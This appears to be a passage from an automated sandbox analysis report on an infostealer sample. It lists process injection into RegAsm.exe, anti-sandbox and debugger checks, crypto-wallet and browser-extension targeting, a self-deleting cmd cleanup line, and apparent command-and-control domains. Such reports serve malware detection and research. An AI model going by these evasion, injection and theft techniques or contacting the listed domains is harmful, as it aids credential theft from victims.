Source: Yara match	File source: 3.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1722743408.00000000035B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7520, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe, 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL18:44:1918:44:1918:44:1918:44:1918:44:1918:44:19DELAYS.TMP%S%SNTDLL.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL

Source: C:\Users\user\Desktop\file.exe	Memory allocated: A90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 25B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2430000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Memory allocated: 19A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Memory allocated: 33D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Memory allocated: 31E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

3_2_0040180D

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Window / User API: threadDelayed 498

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 6.7 %

Source: C:\Users\user\Desktop\file.exe TID: 7504	Thread sleep count: 498 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7476	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe TID: 4592	Thread sleep count: 201 > 30	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe TID: 4592	Thread sleep count: 299 > 30	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe TID: 432	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6092	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 4020	Thread sleep count: 88 > 30	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

3_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415406 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414C91 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414C91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415F9A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415F9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415AD4 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_00415AD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041510B GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_0041510B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410FBA GetSystemInfo,wsprintfA,

3_2_00410FBA

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: Amcache.hve.16.dr	Binary or memory string: VMware
Source: Amcache.hve.16.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.16.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.16.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.16.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.16.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.16.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.16.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000003.00000002.2429083892.0000000001481000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000141A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2580289751.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2580289751.000000000070E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.16.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 0000000A.00000002.2580289751.000000000070E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: Amcache.hve.16.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.16.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.16.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.16.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.16.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000141A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.16.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.16.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.16.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.16.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.16.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.16.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.16.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000141A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.16.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.16.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.16.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.16.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.16.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.16.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.16.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.16.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-71036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-71052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-72377
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 10_2_00446730 LdrInitializeThunk,

10_2_00446730

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041D95C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_0041D95C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_0041891A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]	3_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]	3_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00418563 mov eax, dword ptr fs:[00000030h]	3_2_00418563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00418562 mov eax, dword ptr fs:[00000030h]	3_2_00418562

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA,

3_2_0040884C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041D95C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041D95C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004275FE SetUnhandledExceptionFilter,	3_2_004275FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041CFE0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C21AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C21AC62

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7520, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_025B212D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

0_2_025B212D

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A			Jump to behavior

LummaC encrypted strings found

Source: BKKKEGIDBG.exe, 00000008.00000002.2382103239.00000000043D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: strappystyio.shop
Source: BKKKEGIDBG.exe, 00000008.00000002.2382103239.00000000043D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: coursedonnyre.shop
Source: BKKKEGIDBG.exe, 00000008.00000002.2382103239.00000000043D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fossillargeiw.shop
Source: BKKKEGIDBG.exe, 00000008.00000002.2382103239.00000000043D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tendencerangej.shop
Source: BKKKEGIDBG.exe, 00000008.00000002.2382103239.00000000043D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: appleboltelwk.shop
Source: BKKKEGIDBG.exe, 00000008.00000002.2382103239.00000000043D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tearrybyiwo.shop
Source: BKKKEGIDBG.exe, 00000008.00000002.2382103239.00000000043D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: captainynfanw.shop
Source: BKKKEGIDBG.exe, 00000008.00000002.2382103239.00000000043D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: surveriysiop.shop

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 114B008	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45F000	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 3BE008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BKKKEGIDBG.exe "C:\ProgramData\BKKKEGIDBG.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CAEHCFCBKKJD" & exit	Jump to behavior
Source: C:\ProgramData\BKKKEGIDBG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6C264760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

3_2_6C264760

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6C141C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

3_2_6C141C30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040111D cpuid

3_2_0040111D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	3_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_0042B09C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_0042B191
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	3_2_0042B238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_0042B293
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	3_2_0042AB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	3_2_004253B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_0042B464
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	3_2_0042746C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_00427546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesA,	3_2_0042B526
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429D3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	3_2_0042E53F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	3_2_0042B5F3
